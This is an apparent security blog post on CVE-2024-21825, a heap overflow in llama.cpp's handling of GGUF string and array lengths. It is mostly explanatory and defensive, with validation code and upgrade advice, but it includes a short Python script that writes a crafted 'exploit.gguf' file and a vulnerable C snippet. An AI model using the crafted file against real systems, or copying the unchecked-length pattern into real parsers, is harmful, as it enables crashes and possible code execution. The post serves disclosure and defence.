

A fresh vulnerability, tagged CVE-2024-21825, has been uncovered in the open-source llama.cpp project. This bug lurks in the library’s handling of GGUF_TYPE_ARRAY and GGUF_TYPE_STRING during parsing of .gguf files. If an attacker feeds a specially crafted .gguf file into a vulnerable version (commit 18c2e17), they can trigger a heap-based buffer overflow, potentially leading to remote code execution. In this post, we’ll break down what’s happening, show some code, walk through a simple exploit scenario, and offer security tips.

About llama.cpp and GGUF

llama.cpp is a popular project for running Llama models on consumer hardware. It uses the GGUF format (llama.cpp’s own format) to describe model weights and meta information.

Within the .gguf format, things like GGUF_TYPE_STRING or GGUF_TYPE_ARRAY are used to represent text and array fields, respectively. Handling these fields requires careful parsing, since a malformed file might trick the software into allocating memory incorrectly.
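To make the idea of a length-prefixed field concrete, here is a minimal Python sketch of how a string field can be packed and parsed. It assumes the string layout described in the GGUF specification (a little-endian 64-bit length followed by the raw bytes). The names `pack_string` and `parse_string` are hypothetical helpers for illustration, not llama.cpp functions.

```python
import struct

def pack_string(text: str) -> bytes:
    """Encode a string as <u64 little-endian length><UTF-8 bytes>."""
    data = text.encode("utf-8")
    return struct.pack("<Q", len(data)) + data

def parse_string(blob: bytes, offset: int = 0):
    """Decode one length-prefixed string; return (text, next_offset)."""
    if len(blob) - offset < 8:
        raise ValueError("truncated length prefix")
    (length,) = struct.unpack_from("<Q", blob, offset)
    start = offset + 8
    # The declared length comes from the file, so compare it with
    # the number of bytes that are really available before using it.
    if length > len(blob) - start:
        raise ValueError("declared length exceeds remaining bytes")
    return blob[start:start + length].decode("utf-8"), start + length

field = pack_string("llama")
print(field.hex())
print(parse_string(field))
```

The important detail is that the length is data supplied by whoever wrote the file, so a parser has to treat it as untrusted until it has been checked.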

The Vulnerability Explained

Commit 18c2e17 contains a parsing bug in the code that handles these GGUF types. When reading a string or an array, the code reads the length of the data from the file and then allocates a buffer to hold the contents. The length is not sufficiently validated, so a huge value (or a negative one reinterpreted as unsigned) can lead to a heap overflow.

Key point:

If the file claims an absurdly large length (e.g., 0xFFFFFFFF), the size computation can wrap around so that the code allocates too little memory, and the subsequent read then overwrites adjacent heap memory.

Here’s a simplified snippet that illustrates the bug:

// Pseudocode based on GGUF parsing logic

uint32_t length;

fread(&length, sizeof(length), 1, file); // could be user-controlled!

char *buffer = malloc(length + 1); // +1 for a terminator: the sum wraps to 0 when length is 0xFFFFFFFF

if (!buffer) return;

fread(buffer, 1, length, file); // heap overflow: writes up to 'length' bytes into the undersized buffer

The missing sanity check on length is the issue: malloc() can succeed with a smaller, accidentally wrapped size, while fread() still writes up to length bytes and walks past the end of the buffer.
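The wrap-around is easier to see with numbers. The sketch below emulates fixed-width unsigned arithmetic in Python and compares the size the data really needs with the size a 32-bit computation would request. The specific expressions (a length plus one terminator byte, a count times an 8-byte element) are assumptions chosen for illustration, and the exact expressions in llama.cpp may differ.

```python
def wrapped_size(count: int, elem_size: int = 1, extra: int = 0, bits: int = 32) -> int:
    """Result of count * elem_size + extra in fixed-width unsigned arithmetic."""
    return (count * elem_size + extra) & ((1 << bits) - 1)

# (label, count, element size, extra bytes) -- illustrative values only
cases = [
    ("string, length + 1", 0xFFFFFFFF, 1, 1),
    ("array, count * 8", 0x20000001, 8, 0),
    ("benign string", 100, 1, 1),
]

for label, count, elem_size, extra in cases:
    needed = count * elem_size + extra                 # what the data really requires
    allocated = wrapped_size(count, elem_size, extra)  # what a 32-bit computation asks for
    print(f"{label}: needs {needed:#x} bytes, allocates {allocated:#x}")
```

In the first two cases the requested allocation collapses to a handful of bytes (or zero) while the read that follows still uses the original, huge count.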

Crafting a Malicious .gguf File

Attackers can create a .gguf file where the string or array metadata contains an abnormally large value for its length field. When parsed, it tricks llama.cpp into overrunning the heap buffer.

Here’s how such a file header might look (using Python):

# This is just a simplified example!

malicious_length = 0xFFFFFFF8 # absurd size > real file

payload = b'GGUF' # .gguf header

payload += b'\x00\x00\x00\x00' # some version field

payload += malicious_length.to_bytes(4, 'little')

payload += b'A' * 100 # short actual content

with open("exploit.gguf", "wb") as f:

    f.write(payload)

When this file is loaded, the parser tries to read malicious_length bytes into a heap buffer that is too small, so the bytes the file supplies land past the end of the buffer and corrupt adjacent memory.
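The tell-tale sign of such a file is a declared length far larger than the data that follows it. The sketch below rebuilds the toy layout from the example above (4-byte magic, 4-byte version, 4-byte length, then content) and measures that gap. The layout is the simplified one used in this post, not the real GGUF header, and `build_toy_file` and `length_mismatch` are hypothetical names.

```python
import struct

HEADER_SIZE = 12  # toy layout: 4-byte magic + 4-byte version + 4-byte length

def build_toy_file(declared_length: int, content: bytes) -> bytes:
    """Assemble the simplified file: magic, version, declared length, content."""
    return b"GGUF" + b"\x00" * 4 + struct.pack("<I", declared_length) + content

def length_mismatch(blob: bytes) -> int:
    """Return by how many bytes the declared length exceeds the real content (0 if none)."""
    (declared,) = struct.unpack_from("<I", blob, 8)
    actual = len(blob) - HEADER_SIZE
    return max(0, declared - actual)

crafted = build_toy_file(0xFFFFFFF8, b"A" * 100)
honest = build_toy_file(100, b"A" * 100)
print(length_mismatch(crafted))  # large positive gap
print(length_mismatch(honest))   # no gap
```

A loader that performs this comparison before allocating can reject the crafted file outright.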

Exploitation

On modern systems with heap protections, exploitation might not be trivial, but a skilled attacker can still:

- Crash the application in a predictable way, causing a denial of service.

- Plant shellcode or ROP gadgets to eventually gain code execution, especially on platforms/environments with weaker mitigations.

If the software has been built without address sanitizer or other hardening, the risk is higher.

What’s at risk?

- Code execution under the current user, potential privilege escalation if running as a privileged user, or denial of service.

How To Fix

Upgrade to the latest version of llama.cpp.

llama.cpp is actively maintained, so pull the latest commit.

Sanitize input!

Add strict validation for lengths before allocating buffers. For example:

if (length > MAX_SAFE_LENGTH) {

    fprintf(stderr, "Input too large!\n");

    abort();

}
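For array fields, the check has to cover the multiplication as well as the raw count. The sketch below shows one way to do this, written in Python for brevity: it divides the limit by the element size rather than multiplying the count, which is the usual overflow-safe form of the test in C. The 1 MiB value of `MAX_SAFE_LENGTH`, the simplified array layout (a 64-bit count followed by 32-bit elements), and the function names are all assumptions for illustration.

```python
import io
import struct

MAX_SAFE_LENGTH = 1 << 20  # hypothetical cap in bytes (1 MiB); tune per application

def checked_size(count: int, elem_size: int, limit: int = MAX_SAFE_LENGTH) -> int:
    """Return count * elem_size, rejecting counts whose product would exceed limit."""
    # Dividing the limit (instead of multiplying the count) keeps the
    # comparison itself from overflowing in fixed-width languages.
    if count > limit // elem_size:
        raise ValueError(f"declared count {count} exceeds limit")
    return count * elem_size

def read_u32_array(stream: io.BufferedIOBase) -> list:
    """Read <u64 count><count * u32> from stream, validating before reading."""
    header = stream.read(8)
    if len(header) != 8:
        raise ValueError("truncated count")
    (count,) = struct.unpack("<Q", header)
    size = checked_size(count, 4)
    data = stream.read(size)
    if len(data) != size:
        raise ValueError("file ends before the declared array does")
    return list(struct.unpack(f"<{count}I", data))

good = struct.pack("<Q", 3) + struct.pack("<3I", 1, 2, 3)
print(read_u32_array(io.BytesIO(good)))
```

With this structure, a crafted count such as 0xFFFFFFFFFFFFFFFF is rejected with an error before any buffer is sized or read. Returning an error to the caller is also gentler than abort(), which would itself let a bad file terminate the process.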

References

- Original GGUF Specification

- Vulnerable Commit 18c2e17

- CVE-2024-21825 Security Page (tentative, may update)

- llama.cpp Issues

Summary

- CVE-2024-21825 is a major heap overflow bug in GGUF string/array handling of llama.cpp up to commit 18c2e17.

- Update immediately and avoid opening .gguf files you don’t trust.


Timeline

Published on: 02/26/2024 16:27:55 UTC

Last modified on: 02/26/2024 18:15:07 UTC